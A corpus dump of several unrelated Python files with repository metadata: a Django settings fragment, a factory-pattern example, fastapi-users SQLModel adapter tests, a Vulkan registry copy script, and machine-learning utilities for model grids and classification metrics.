'djauth.ldapBackend.LDAPBackend', 'django.contrib.auth.backends.ModelBackend', ) LOGIN_URL = '/djskeletor/accounts/login/' LOGIN_REDIRECT_URL = '/djskeletor/' USE_X_FORWARDED_HOST = True #SESSION_ENGINE = "django.contrib.sessions.backends.cache" SESSION_EXPIRE_AT_BROWSER_CLOSE = False SESSION_COOKIE_DOMAIN=".carthage.edu" SESSION_COOKIE_NAME ='django_djskeletor_cookie' SESSION_COOKIE_AGE = 86400 # SMTP settings EMAIL_HOST = '' EMAIL_HOST_USER = '' EMAIL_HOST_PASSWORD = '' EMAIL_USE_TLS = True EMAIL_PORT = 587 EMAIL_FAIL_SILENTLY = False DEFAULT_FROM_EMAIL = '' SERVER_EMAIL = '' SERVER_MAIL='' # logging LOG_FILEPATH = os.path.join(os.path.dirname(__file__), "logs/") LOG_FILENAME = LOG_FILEPATH + "debug.log" LOGGING = { 'version': 1, 'disable_existing_loggers': True, 'formatters': { 'standard': { 'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s", 'datefmt' : "%Y/%b/%d %H:%M:%S" }, 'verbose': { 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s', 'datefmt' : "%Y/%b/%d %H:%M:%S" }, 'simple': { 'format': '%(levelname)s %(message)s' }, }, 'filters': { 'require_debug_false': { '()': 'django.utils.log.RequireDebugFalse' } }, 'handlers': { 'null': { 'level':'DEBUG', 'class':'django.utils.log.NullHandler', }, 'logfile': { 'level':'DEBUG', 'class':'logging.handlers.RotatingFileHandler', 'filename': LOG_FILENAME, 'maxBytes': 50000, 'backupCount': 2, 'formatter': 'standard', }, 'console':{ 'level':'INFO', 'class':'logging.StreamHandler', 'formatter': 'standard' }, 'mail_admins': { 'level': 'ERROR', 'filters': ['require_debug_false'], 'include_html': True, 'class': 'django.utils.log.AdminEmailHandler' } }, 'loggers': { 'djskeletor': { 'handlers':['logfile'], 'propagate': True, 'level':'DEBUG', }, 'django': { 'handlers':['console'], 'propagate': True, 'level':'WARN', }, 'django.db.backends': { 'handlers': ['console'], 'level': 'DEBUG', 'propagate': False, }, 'django.request': { 'handlers': ['mail_admins'], 'level': 'ERROR', 'propagate': True, }, } }
27.552743
96
0.620214
0
0
0
0
0
0
0
0
3,590
0.54977
4c6339b396838bba425536d8c48a53a76850151f
956
py
Python
records/12-09/ffff.py
AaronYang2333/CSCI_570
03e34ce5ff192fc94612bc3afb51dcab3e854462
[ "Apache-2.0" ]
36
2020-07-25T00:13:25.000Z
2022-02-28T17:48:15.000Z
records/12-09/ffff.py
AaronYang2333/LeetCode
03e34ce5ff192fc94612bc3afb51dcab3e854462
[ "Apache-2.0" ]
6
2020-06-06T04:39:37.000Z
2021-04-03T01:45:39.000Z
records/12-09/ffff.py
AaronYang2333/LeetCode
03e34ce5ff192fc94612bc3afb51dcab3e854462
[ "Apache-2.0" ]
16
2020-12-16T02:38:16.000Z
2022-02-28T17:48:16.000Z
__author__ = 'Aaron Yang'
__email__ = '[email protected]'
__date__ = '12/9/2020 4:18 PM'

from abc import abstractmethod


class Product(object):
    @abstractmethod
    def setMsg(self, msg="default info"):
        self.msg = msg

    @abstractmethod
    def info(self):
        print(self.msg)


class DefaultObj(Product):
    def __init__(self):
        super().setMsg()


class Factory(object):
    @abstractmethod
    def produce(self):
        return DefaultObj()


class PC(Product):
    def __init__(self):
        self.setMsg('pc info')


class LAPTOP(Product):
    def __init__(self):
        self.setMsg('laptop info')


class PCFactory(Factory):
    def produce(self):
        return PC()


class LAPTOPFactory(Factory):
    def produce(self):
        return LAPTOP()


if __name__ == '__main__':
    ss = Factory().produce()
    pc = PCFactory().produce()
    laptop = LAPTOPFactory().produce()
    pc.info()
    laptop.info()
    ss.info()
16.20339
41
0.624477
640
0.669456
0
0
205
0.214435
0
0
95
0.099372
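One caveat about the snippet above: @abstractmethod only has teeth on classes whose metaclass is ABCMeta, so Product() and Factory() remain instantiable as written. A minimal corrected sketch of the same factory-method idea using abc.ABC (names here are illustrative, not from the original file):

from abc import ABC, abstractmethod

class StrictProduct(ABC):
    @abstractmethod
    def info(self) -> None: ...

class StrictPC(StrictProduct):
    def info(self) -> None:
        print('pc info')

# StrictProduct() now raises TypeError; the concrete subclass works:
StrictPC().info()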
4c63d036bfd0e51ade860a3521aecee117e88f7d
7,064
py
Python
tests/test_users.py
fastapi-users/fastapi-users-db-sqlmodel
3a46b80399f129aa07a834a1b40bf49d08c37be1
[ "MIT" ]
18
2021-09-09T09:35:30.000Z
2022-03-19T04:58:17.000Z
tests/test_users.py
fastapi-users/fastapi-users-db-sqlmodel
3a46b80399f129aa07a834a1b40bf49d08c37be1
[ "MIT" ]
null
null
null
tests/test_users.py
fastapi-users/fastapi-users-db-sqlmodel
3a46b80399f129aa07a834a1b40bf49d08c37be1
[ "MIT" ]
3
2021-11-01T16:58:54.000Z
2022-02-15T16:17:11.000Z
import uuid
from typing import AsyncGenerator

import pytest
from sqlalchemy import exc
from sqlalchemy.ext.asyncio import AsyncSession, create_async_engine
from sqlalchemy.orm import sessionmaker
from sqlmodel import Session, SQLModel, create_engine

from fastapi_users_db_sqlmodel import (
    NotSetOAuthAccountTableError,
    SQLModelUserDatabase,
    SQLModelUserDatabaseAsync,
)
from tests.conftest import OAuthAccount, UserDB, UserDBOAuth

safe_uuid = uuid.UUID("a9089e5d-2642-406d-a7c0-cbc641aca0ec")


async def init_sync_session(url: str) -> AsyncGenerator[Session, None]:
    engine = create_engine(url, connect_args={"check_same_thread": False})
    SQLModel.metadata.create_all(engine)
    with Session(engine) as session:
        yield session
    SQLModel.metadata.drop_all(engine)


async def init_async_session(url: str) -> AsyncGenerator[AsyncSession, None]:
    engine = create_async_engine(url, connect_args={"check_same_thread": False})
    make_session = sessionmaker(engine, class_=AsyncSession, expire_on_commit=False)
    async with engine.begin() as conn:
        await conn.run_sync(SQLModel.metadata.create_all)
        async with make_session() as session:
            yield session
        await conn.run_sync(SQLModel.metadata.drop_all)


@pytest.fixture(
    params=[
        (init_sync_session, "sqlite:///./test-sqlmodel-user.db", SQLModelUserDatabase),
        (
            init_async_session,
            "sqlite+aiosqlite:///./test-sqlmodel-user.db",
            SQLModelUserDatabaseAsync,
        ),
    ],
    ids=["sync", "async"],
)
async def sqlmodel_user_db(request) -> AsyncGenerator[SQLModelUserDatabase, None]:
    create_session = request.param[0]
    database_url = request.param[1]
    database_class = request.param[2]
    async for session in create_session(database_url):
        yield database_class(UserDB, session)


@pytest.fixture(
    params=[
        (
            init_sync_session,
            "sqlite:///./test-sqlmodel-user-oauth.db",
            SQLModelUserDatabase,
        ),
        (
            init_async_session,
            "sqlite+aiosqlite:///./test-sqlmodel-user-oauth.db",
            SQLModelUserDatabaseAsync,
        ),
    ],
    ids=["sync", "async"],
)
async def sqlmodel_user_db_oauth(request) -> AsyncGenerator[SQLModelUserDatabase, None]:
    create_session = request.param[0]
    database_url = request.param[1]
    database_class = request.param[2]
    async for session in create_session(database_url):
        yield database_class(UserDBOAuth, session, OAuthAccount)


@pytest.mark.asyncio
@pytest.mark.db
async def test_queries(sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]):
    user = UserDB(
        id=safe_uuid,
        email="[email protected]",
        hashed_password="guinevere",
    )

    # Create
    user_db = await sqlmodel_user_db.create(user)
    assert user_db.id is not None
    assert user_db.is_active is True
    assert user_db.is_superuser is False
    assert user_db.email == user.email

    # Update
    user_db.is_superuser = True
    await sqlmodel_user_db.update(user_db)

    # Get by id
    id_user = await sqlmodel_user_db.get(user.id)
    assert id_user is not None
    assert id_user.id == user_db.id
    assert id_user.is_superuser is True

    # Get by email
    email_user = await sqlmodel_user_db.get_by_email(str(user.email))
    assert email_user is not None
    assert email_user.id == user_db.id

    # Get by uppercased email
    email_user = await sqlmodel_user_db.get_by_email("[email protected]")
    assert email_user is not None
    assert email_user.id == user_db.id

    # Unknown user
    unknown_user = await sqlmodel_user_db.get_by_email("[email protected]")
    assert unknown_user is None

    # Delete user
    await sqlmodel_user_db.delete(user)
    deleted_user = await sqlmodel_user_db.get(user.id)
    assert deleted_user is None

    # Exception when trying to get by OAuth account
    with pytest.raises(NotSetOAuthAccountTableError):
        await sqlmodel_user_db.get_by_oauth_account("foo", "bar")


@pytest.mark.asyncio
@pytest.mark.db
async def test_insert_existing_email(
    sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]
):
    user = UserDB(
        id=safe_uuid,
        email="[email protected]",
        hashed_password="guinevere",
    )
    await sqlmodel_user_db.create(user)

    with pytest.raises(exc.IntegrityError):
        await sqlmodel_user_db.create(
            UserDB(id=safe_uuid, email=user.email, hashed_password="guinevere")
        )


@pytest.mark.asyncio
@pytest.mark.db
async def test_insert_non_nullable_fields(
    sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]
):
    with pytest.raises(exc.IntegrityError):
        wrong_user = UserDB(
            id=safe_uuid, email="[email protected]", hashed_password="aaa"
        )
        wrong_user.email = None  # type: ignore
        await sqlmodel_user_db.create(wrong_user)


@pytest.mark.asyncio
@pytest.mark.db
async def test_queries_custom_fields(
    sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount],
):
    """It should output custom fields in query result."""
    user = UserDB(
        id=safe_uuid,
        email="[email protected]",
        hashed_password="guinevere",
        first_name="Lancelot",
    )
    await sqlmodel_user_db.create(user)

    id_user = await sqlmodel_user_db.get(user.id)
    assert id_user is not None
    assert id_user.id == user.id
    assert id_user.first_name == user.first_name


@pytest.mark.asyncio
@pytest.mark.db
async def test_queries_oauth(
    sqlmodel_user_db_oauth: SQLModelUserDatabase[UserDBOAuth, OAuthAccount],
    oauth_account1,
    oauth_account2,
):
    user = UserDBOAuth(
        id=safe_uuid,
        email="[email protected]",
        hashed_password="guinevere",
        oauth_accounts=[oauth_account1, oauth_account2],
    )

    # Create
    user_db = await sqlmodel_user_db_oauth.create(user)
    assert user_db.id is not None
    assert hasattr(user_db, "oauth_accounts")
    assert len(user_db.oauth_accounts) == 2

    # Update
    user_db.oauth_accounts[0].access_token = "NEW_TOKEN"
    await sqlmodel_user_db_oauth.update(user_db)

    # Get by id
    id_user = await sqlmodel_user_db_oauth.get(user.id)
    assert id_user is not None
    assert id_user.id == user_db.id
    assert id_user.oauth_accounts[0].access_token == "NEW_TOKEN"

    # Get by email
    email_user = await sqlmodel_user_db_oauth.get_by_email(str(user.email))
    assert email_user is not None
    assert email_user.id == user_db.id
    assert len(email_user.oauth_accounts) == 2

    # Get by OAuth account
    oauth_user = await sqlmodel_user_db_oauth.get_by_oauth_account(
        oauth_account1.oauth_name, oauth_account1.account_id
    )
    assert oauth_user is not None
    assert oauth_user.id == user.id
    assert len(oauth_user.oauth_accounts) == 2

    # Unknown OAuth account
    unknown_oauth_user = await sqlmodel_user_db_oauth.get_by_oauth_account("foo", "bar")
    assert unknown_oauth_user is None
30.982456
88
0.709513
0
0
1,368
0.193658
5,775
0.817525
5,674
0.803228
841
0.119054
4c64a40785307d838c76dd7877d9296fa9590e81
623
py
Python
copy_reg.py
rtbo/vkdgen
04a228961bb091b59dc6f741eee703cd81724ca3
[ "MIT" ]
2
2021-01-08T15:05:27.000Z
2021-10-12T08:44:01.000Z
copy_reg.py
rtbo/vkdgen
04a228961bb091b59dc6f741eee703cd81724ca3
[ "MIT" ]
null
null
null
copy_reg.py
rtbo/vkdgen
04a228961bb091b59dc6f741eee703cd81724ca3
[ "MIT" ]
null
null
null
#! /usr/bin/env python3

import os
from os import path

root_dir = path.dirname(path.realpath(__file__))
local_reg_dir = path.join(root_dir, 'registry')

os.makedirs(local_reg_dir, exist_ok=True)


def copy_reg(reg_dir, files):
    import shutil
    for f in files:
        file_path = path.join(reg_dir, f)
        if not path.isfile(file_path):
            raise RuntimeError(file_path + ' could not be found')
        shutil.copy2(file_path, path.join(local_reg_dir, path.basename(f)))


vk_files = [
    'registry/vk.xml',
    'registry/reg.py',
    'registry/generator.py'
]
copy_reg(path.join(root_dir, 'Vulkan-Headers'), vk_files)
31.15
76
0.704655
0
0
0
0
0
0
0
0
127
0.203852
4c64de6df990440fb9bf292eb702bdb614dfcfae
22,653
py
Python
utils.py
atward424/ASCVD_ML
39404dd5f50a527576b91e8f53f5157f76382712
[ "Apache-2.0" ]
1
2021-04-08T07:05:18.000Z
2021-04-08T07:05:18.000Z
utils.py
atward424/ASCVD_ML
39404dd5f50a527576b91e8f53f5157f76382712
[ "Apache-2.0" ]
null
null
null
utils.py
atward424/ASCVD_ML
39404dd5f50a527576b91e8f53f5157f76382712
[ "Apache-2.0" ]
1
2021-04-08T07:07:53.000Z
2021-04-08T07:07:53.000Z
import numpy as np
import pandas as pd
import scipy.stats as st
#from medical_ML import Experiment

import matplotlib.pyplot as plt
import xgboost as xgb
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.dummy import DummyClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression, Lasso
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn import linear_model
from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor
from sklearn.dummy import DummyRegressor


def split_cohort(datafile, to_exclude = None, test_ind_col = None, drop = 'some'):
    """ Load and clean the dataset """
    if isinstance(datafile, str):
        data = pd.read_csv(datafile)
    else:
        data = datafile
    test_data = None
    if to_exclude is not None:
        for k in to_exclude.keys():
            if k == 'race':
                data = data[data[k].isin(to_exclude[k])]
            elif k == 'agebl':
                data = data[data[k] >= to_exclude[k]]
            elif to_exclude[k]:
                data = data[data[k] == 0]
                if drop == 'some':
                    data = data.drop(k, axis = 1)
            if drop == 'all':
                if (k != 'race') & (k != 'agebl'):
                    data = data.drop(k, axis = 1)
            # self.data = self.data[self.data['year'] <= 2010]
            # self.data = self.data.drop(['year'], axis = 1)
    if test_ind_col is not None:
        test_data = data[data[test_ind_col] == 1]
        test_data = test_data.drop(test_ind_col, axis = 1)
        data = data[data[test_ind_col] == 0]
        data = data.drop(test_ind_col, axis = 1)
    return(data, test_data)


def calc_auc_conf_interval(AUC, N1, N2, ci = 0.95):
    # from https://ncss-wpengine.netdna-ssl.com/wp-content/themes/ncss/pdf/Procedures/PASS/Confidence_Intervals_for_the_Area_Under_an_ROC_Curve.pdf
    zsc = st.norm.ppf(1 - (1-ci)/2.)
    q1 = AUC / (2 - AUC)
    q2 = (2 * AUC * AUC) / (1 + AUC)
    numerator = AUC * (1 - AUC) + (N1 - 1) * (q1 - AUC * AUC) + (N2 - 1) * (q2 - AUC * AUC)
    denom = N1 * N2
    se_AUC = np.sqrt(numerator / denom)
    return (se_AUC, AUC - zsc * se_AUC, AUC, AUC + zsc * se_AUC)


def load_models_and_parameters_default():
    models_and_parameters = {
        'dummy_reg': (DummyRegressor(),
                      {"strategy": ["mean"]}),
        'lasso_reg': (linear_model.Lasso(),
                      {'alpha': np.arange(0.1, 1.0, 0.01),
                       'max_iter': [10000]}),
        'rf_reg': (RandomForestRegressor(),
                   {'n_estimators': [501],
                    'criterion': ['mae'],
                    'max_depth': [3, 5, 10],
                    'max_features': ['auto', 'sqrt', 'log2']}),
        'gbm_reg': (GradientBoostingRegressor(),
                    {'n_estimators': [501],
                     'criterion': ['mae'],
                     # 'loss': ['ls', 'lad'],
                     'max_depth': [3, 5, 10],
                     'max_features': ['auto', 'sqrt', 'log2']}),
        'dummy': (DummyClassifier(),
                  {"strategy": ["most_frequent"]}),
        # 'logreg': (LogisticRegression(),
        #            {"class_weight": [None],
        #             "C":[0.1, 0.3, 1,5, 10]}), #, "balanced"
        # 'logreg': (LogisticRegression(),
        #            {"class_weight": [None],
        #             "C":[0.01,0.1, 1]}), #, "balanced"
        #             "C":[0.1]}), #, "balanced"
        'logreg': (LogisticRegression(),
                   {}), #, "balanced"
        #            "C":[0.1]}), #, "balanced"
        'lasso': (Lasso(),
                  {"alpha": [0.0001, 0.001], #np.arange(0.01, 1.01, 0.05),
                   'max_iter': [10000]}),
        # 'lasso2': (LogisticRegression(penalty = 'l1'),
        #            {"C":[0.001, 0.01,0.1, 1]}),
        'lasso2': (LogisticRegression(penalty = 'l1', solver ='saga'),
                   {}),
        'elnet': (LogisticRegression(penalty = 'elasticnet', solver = 'saga'),
                  {"C":[0.001, 0.01,0.1, 1],
                   "l1_ratio":[0.01, 0.1, 0.5, 0.9, 0.99]}),
        'dt': (DecisionTreeClassifier(),
               {"criterion": ["entropy"],
                # "max_depth": [2, 3, 4, 5, 10, 20], # None
                "max_depth": [1, 2, 3, 4], # None
                "splitter": ["best", "random"],
                "min_samples_split": [2, 5, 10],
                "min_samples_leaf": [3, 5, 10, 15, 20],
                "random_state": [817263]}),
        'svm': (SVC(),
                {'C': [ 1],
                 'kernel': ['linear']}), #'poly', 'rbf'
        'knn': (KNeighborsClassifier(),
                {'n_neighbors': [2, 3, 5, 10, 20, 50],
                 'weights': ['uniform', 'distance']}),
        # 'rf': (RandomForestClassifier(),
        #        {'n_estimators': [501],
        #         'max_depth': [3, 5, 10],
        #         'max_features': ['auto', 'sqrt', 'log2']}),
        # 'rf': (RandomForestClassifier(),
        #        {'n_estimators': [50, 100, 501, 1000],
        #         'max_depth': [3,5,7],
        #         "min_samples_split": [2, 5],
        #         'max_features': ['auto', 0.5],
        #         "class_weight": [None, "balanced"]}),
        # 'rf': (RandomForestClassifier(),
        #        {'n_estimators': [501],
        #         'max_depth': [5],
        #         "min_samples_split": [5],
        #         'max_features': ['auto'],
        #         "class_weight": [None]}),
        # 'rf': (RandomForestClassifier(),
        #        {'n_estimators': [ 501, 1000, 2000, 4000],
        #         'max_depth': [5, 7, 9, 11, 13],
        #         "min_samples_split": [2],
        #         'max_features': ['sqrt', 0.25, 0.5, 0.75, 1.0],
        #         "class_weight": [None]}),
        # 'rf': (RandomForestClassifier(),
        #        {'n_estimators': [200, 500, 1000],
        #         'max_depth': [4, 6, 8, 10],
        #         "min_samples_split": [2, 10],
        #         'max_features': [0.25, 0.5],
        #         "class_weight": [None]}),
        'rf': (RandomForestClassifier(),
               {'n_estimators': [800],
                'max_depth': [8],
                "min_samples_split": [10],
                'max_features': [0.25],
                "class_weight": [None]}),
        # 'rf': (RandomForestClassifier(),
        #        {'n_estimators': [400, 500, 600],
        #         'max_depth': [7,8,9],
        #         "min_samples_split": [5,10],
        #         'max_features': [0.25, 0.5, ]}),
        # 'rf': (RandomForestClassifier(),
        #        {}),
        'xgb': (xgb.XGBClassifier(),
                {}),
        # 'rf': (RandomForestClassifier(),
        #        {'n_estimators': [600],
        #         'max_depth': [9],
        #         "min_samples_split": [10],
        #         'max_features': [0.25]}),
        # # 'xgb': (xgb.XGBClassifier(),
        #          {'n_estimators': [100,500],
        #           'max_depth': [3,4,5],
        #           'learning_rate': [0.1, 0.3],
        #           "reg_alpha": [0, 1],
        #           "reg_lambda": [0.1, 1]}),
        # 'xgb': (xgb.XGBClassifier(),
        #         {'n_estimators': [500],
        #          'max_depth': [4],
        #          'learning_rate': [0.1],
        #          "reg_alpha": [0, 10],
        #          "reg_lambda": [0.1, 10]}),
        # 'gbm': (GradientBoostingClassifier(),
        #         {'n_estimators': [200, 300],
        #          'learning_rate': [0.01],
        #          'max_depth': [3,4,5],
        #          'subsample': [0.35, 0.7],
        #          'max_features': [0.25]}),
        # 'gbm': (GradientBoostingClassifier(),
        #         {'n_estimators': [400],
        #          'learning_rate': [0.01],
        #          'max_depth': [5],
        #          'subsample': [0.75],
        #          'max_features': [0.25]}),
        # 'gbm': (GradientBoostingClassifier(),
        #         {'n_estimators': [300, 400, 500],
        #          'learning_rate': [0.01, 0.003, 0.4],
        #          'max_depth': [5, 6, 7],
        #          'subsample': [0.85, 1],
        #          'max_features': [0.25, 0.5]}),
        'gbm': (GradientBoostingClassifier(),
                {}),
        # 'gbm': (GradientBoostingClassifier(),
        #         {'n_estimators': [100, 200, 300, 500, 1000, 2000,
        #                           4000],
        #          'max_depth': [2, 3, 4, 5, 6, 7,
        #                        9],
        #          'subsample': [0.75,
        #                        1],
        #          'max_features': ['sqrt', 'log2', 0.25, 0.5, 0.75,
        #                           1.0]}),
        # 'gbm': (GradientBoostingClassifier(),
        #         {'n_estimators': [100, 200, 400, 800],
        #          'learning_rate': [0.03, 0.01, 0.001],
        #          'max_depth': [4,5,6,8],
        #          'subsample': [0.85],
        #          'max_features': [0.25, 0.5]}),
        # 'gbm': (GradientBoostingClassifier(),
        #         {'n_estimators': [400, 600],
        #          'learning_rate': [0.01],
        #          'max_depth': [5, 6],
        #          'subsample': [0.85],
        #          'max_features': [0.25]}),
        # 'gbm': (GradientBoostingClassifier(),
        #         {'n_estimators': [25, 50, 75, 100, 200],
        #          'max_depth': [2,3,5],
        #          'subsample': [0.25, 0.5, 0.75, 1],
        #          'max_features': [None, 'sqrt', 'log2', 0.5]}),
    }
    return(models_and_parameters)


def load_models_and_parameters():
    models_and_parameters = {
        'dummy_reg': (DummyRegressor(),
                      {"strategy": ["mean"]}),
        'lasso_reg': (linear_model.Lasso(),
                      {'alpha': np.arange(0.1, 1.0, 0.01),
                       'max_iter': [10000]}),
        'rf_reg': (RandomForestRegressor(),
                   {'n_estimators': [501],
                    'criterion': ['mae'],
                    'max_depth': [3, 5, 10],
                    'max_features': ['auto', 'sqrt', 'log2']}),
        'gbm_reg': (GradientBoostingRegressor(),
                    {'n_estimators': [501],
                     'criterion': ['mae'],
                     # 'loss': ['ls', 'lad'],
                     'max_depth': [3, 5, 10],
                     'max_features': ['auto', 'sqrt', 'log2']}),
        'dummy': (DummyClassifier(),
                  {"strategy": ["most_frequent"]}),
        # 'logreg': (LogisticRegression(),
        #            {"class_weight": [None],
        #             "C":[0.1, 0.3, 1,5, 10]}), #, "balanced"
        'logreg': (LogisticRegression(),
                   {"class_weight": [None],
                    "C":[0.01,0.1, 1]}), #, "balanced"
        #           "C":[0.1]}), #, "balanced"
        # 'logreg': (LogisticRegression(),
        #            {}), #, "balanced"
        # #          "C":[0.1]}), #, "balanced"
        'lasso': (Lasso(),
                  {"alpha": [0.0001, 0.001], #np.arange(0.01, 1.01, 0.05),
                   'max_iter': [10000]}),
        'lasso2': (LogisticRegression(penalty = 'l1', solver ='saga'),
                   {"C":[0.001, 0.01,0.1, 1]}),
        # 'lasso2': (LogisticRegression(penalty = 'l1'),
        #            {}),
        'elnet': (LogisticRegression(penalty = 'elasticnet', solver = 'saga'),
                  {"C":[0.001, 0.01,0.1, 1],
                   "l1_ratio":[0.01, 0.1, 0.5, 0.9, 0.99]}),
        'dt': (DecisionTreeClassifier(),
               {"criterion": ["entropy"],
                # "max_depth": [2, 3, 4, 5, 10, 20], # None
                "max_depth": [1, 2, 3, 4], # None
                "splitter": ["best", "random"],
                "min_samples_split": [2, 5, 10],
                "min_samples_leaf": [3, 5, 10, 15, 20],
                "random_state": [817263]}),
        'svm': (SVC(),
                {'C': [ 1],
                 'kernel': ['linear']}), #'poly', 'rbf'
        'knn': (KNeighborsClassifier(),
                {'n_neighbors': [2, 3, 5, 10, 20, 50],
                 'weights': ['uniform', 'distance']}),
        # 'rf': (RandomForestClassifier(),
        #        {'n_estimators': [501],
        #         'max_depth': [3, 5, 10],
        #         'max_features': ['auto', 'sqrt', 'log2']}),
        # 'rf': (RandomForestClassifier(),
        #        {'n_estimators': [50, 100, 501, 1000],
        #         'max_depth': [3,5,7],
        #         "min_samples_split": [2, 5],
        #         'max_features': ['auto', 0.5],
        #         "class_weight": [None, "balanced"]}),
        # 'rf': (RandomForestClassifier(),
        #        {'n_estimators': [501],
        #         'max_depth': [5],
        #         "min_samples_split": [5],
        #         'max_features': ['auto'],
        #         "class_weight": [None]}),
        # 'rf': (RandomForestClassifier(),
        #        {'n_estimators': [ 501, 1000, 2000, 4000],
        #         'max_depth': [5, 7, 9, 11, 13],
        #         "min_samples_split": [2],
        #         'max_features': ['sqrt', 0.25, 0.5, 0.75, 1.0],
        #         "class_weight": [None]}),
        # 'rf': (RandomForestClassifier(),
        #        {'n_estimators': [200, 500, 1000],
        #         'max_depth': [4, 6, 8, 10],
        #         "min_samples_split": [2, 10],
        #         'max_features': [0.25, 0.5],
        #         "class_weight": [None]}),
        'rf': (RandomForestClassifier(),
               {'n_estimators': [500, 1000],
                'max_depth': [8],
                "min_samples_split": [10],
                'max_features': [0.25],
                "class_weight": [None]}),
        # 'rf': (RandomForestClassifier(),
        #        {'n_estimators': [400, 500, 600],
        #         'max_depth': [7,8,9],
        #         "min_samples_split": [5,10],
        #         'max_features': [0.25, 0.5, ]}),
        # 'rf': (RandomForestClassifier(),
        #        {}),
        # 'xgb': (xgb.XGBClassifier(),
        #         {}),
        # 'rf': (RandomForestClassifier(),
        #        {'n_estimators': [600],
        #         'max_depth': [9],
        #         "min_samples_split": [10],
        #         'max_features': [0.25]}),
        # # 'xgb': (xgb.XGBClassifier(),
        #          {'n_estimators': [100,500],
        #           'max_depth': [3,4,5],
        #           'learning_rate': [0.1, 0.3],
        #           "reg_alpha": [0, 1],
        #           "reg_lambda": [0.1, 1]}),
        # 'xgb': (xgb.XGBClassifier(),
        #         {'n_estimators': [500],
        #          'max_depth': [4],
        #          'learning_rate': [0.1],
        #          "reg_alpha": [0, 10],
        #          "reg_lambda": [0.1, 10]}),
        # 'gbm': (GradientBoostingClassifier(),
        #         {'n_estimators': [200, 300],
        #          'learning_rate': [0.01],
        #          'max_depth': [3,4,5],
        #          'subsample': [0.35, 0.7],
        #          'max_features': [0.25]}),
        # 'gbm': (GradientBoostingClassifier(),
        #         {'n_estimators': [400],
        #          'learning_rate': [0.01],
        #          'max_depth': [5],
        #          'subsample': [0.75],
        #          'max_features': [0.25]}),
        # 'gbm': (GradientBoostingClassifier(),
        #         {'n_estimators': [300, 400, 500],
        #          'learning_rate': [0.01, 0.003, 0.4],
        #          'max_depth': [5, 6, 7],
        #          'subsample': [0.85, 1],
        #          'max_features': [0.25, 0.5]}),
        # 'gbm': (GradientBoostingClassifier(),
        #         {}),
        # 'gbm': (GradientBoostingClassifier(),
        #         {'n_estimators': [100, 200, 300, 500, 1000, 2000,
        #                           4000],
        #          'max_depth': [2, 3, 4, 5, 6, 7,
        #                        9],
        #          'subsample': [0.75,
        #                        1],
        #          'max_features': ['sqrt', 'log2', 0.25, 0.5, 0.75,
        #                           1.0]}),
        'gbm': (GradientBoostingClassifier(),
                {'n_estimators': [100, 200, 400, 800],
                 'learning_rate': [0.03, 0.01, 0.001],
                 'max_depth': [4,5,6,8],
                 'subsample': [0.85],
                 'max_features': [0.25, 0.5]}),
        # 'gbm': (GradientBoostingClassifier(),
        #         {'n_estimators': [400, 600],
        #          'learning_rate': [0.01],
        #          'max_depth': [5, 6],
        #          'subsample': [0.85],
        #          'max_features': [0.25]}),
        # 'gbm': (GradientBoostingClassifier(),
        #         {'n_estimators': [25, 50, 75, 100, 200],
        #          'max_depth': [2,3,5],
        #          'subsample': [0.25, 0.5, 0.75, 1],
        #          'max_features': [None, 'sqrt', 'log2', 0.5]}),
    }
    return(models_and_parameters)


def calc_metrics(y_true, y_pred, return_all = False):
    res_df = pd.DataFrame({'y_true' : y_true, 'y_pred': y_pred}, columns = ['y_pred', 'y_true'])
    res_df = res_df.sort_values(by = 'y_pred')
    res_df['TN'] = (res_df.y_true == 0).cumsum()
    res_df['FN'] = (res_df.y_true == 1).cumsum()
    if return_all == False:
        res_df = pd.concat([pd.DataFrame({'y_true' : -1, 'y_pred': -1, "TN": 0, "FN":0}, index = [-1],
                                         columns = ['y_pred', 'y_true', 'TN', "FN"]), res_df], axis = 0)
    res_df['TP'] = (res_df.y_true == 1).sum() - res_df['FN']
    res_df['FP'] = (res_df.y_true == 0).sum() - res_df['TN']
    res_df['sens'] = res_df.TP / (res_df.TP + res_df.FN)
    res_df['spec'] = res_df.TN / (res_df.TN + res_df.FP)
    res_df['PPV'] = res_df.TP / (res_df.TP + res_df.FP)
    res_df['accuracy'] = (res_df.TP + res_df.TN) / (res_df.shape[0])
    res_df['f1_score'] = 2 * res_df.PPV * res_df.sens / (res_df.PPV + res_df.sens)
    res_df['youdens_index'] = res_df.sens + res_df.spec - 1

    # remove predictions which represent non-separable decision points (i.e., y_pred is equal)
    if return_all == False:
        res_df = res_df[(res_df.y_pred.duplicated('last') == False)]
    return(res_df)


def set_up_plot():
    # plt.grid(True, 'major', color = 'w', linewidth = 0.7)
    plt.grid(True, 'major', color = '0.85', linewidth = 0.7)
    plt.grid(True, 'minor', color = "0.92", linestyle = '-', linewidth = 0.7)
    ax = plt.gca()
    plt.xlim([-0.05, 1.05])
    plt.ylim([-0.05, 1.05])
    ax.set_axisbelow(True)
    # ax.patch.set_facecolor("0.85")


def train_val(RESULT_DIR, alldata, models, label = 'Label', cv = 5, score_name = "AUC",
              to_exclude = None, test_ind_col = None, oversample_rate = 1,
              imputer = 'iterative', add_missing_flags = True):
    from medical_ML import Experiment
    print('\n\n' + 'STARTING EXPERIMENT FOR ' + RESULT_DIR + '\n\n')
    expt = Experiment(alldata, label = label, to_exclude = to_exclude,
                      test_ind_col = test_ind_col, drop = 'all', result_dir = RESULT_DIR)
    expt.predict_models_from_groups(0, models, cv=cv, score_name=score_name, mode='classification',
                                    oversample_rate = oversample_rate,
                                    imputer = imputer, add_missing_flags = add_missing_flags)
    expt.save_and_plot_results(models, cv = cv, test = False)
    return(expt)
48.821121
147
0.382201
0
0
0
0
0
0
0
0
12,622
0.557189
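A worked example of calc_auc_conf_interval() from the file above: for AUC = 0.8 with N1 = 50 positives and N2 = 50 negatives, q1 = 0.8/1.2 ≈ 0.667 and q2 = 1.28/1.8 ≈ 0.711, so the standard error is sqrt((0.16 + 49*0.0267 + 49*0.0711) / 2500) ≈ 0.0445 and the 95% interval is roughly 0.8 ± 1.96*0.0445:

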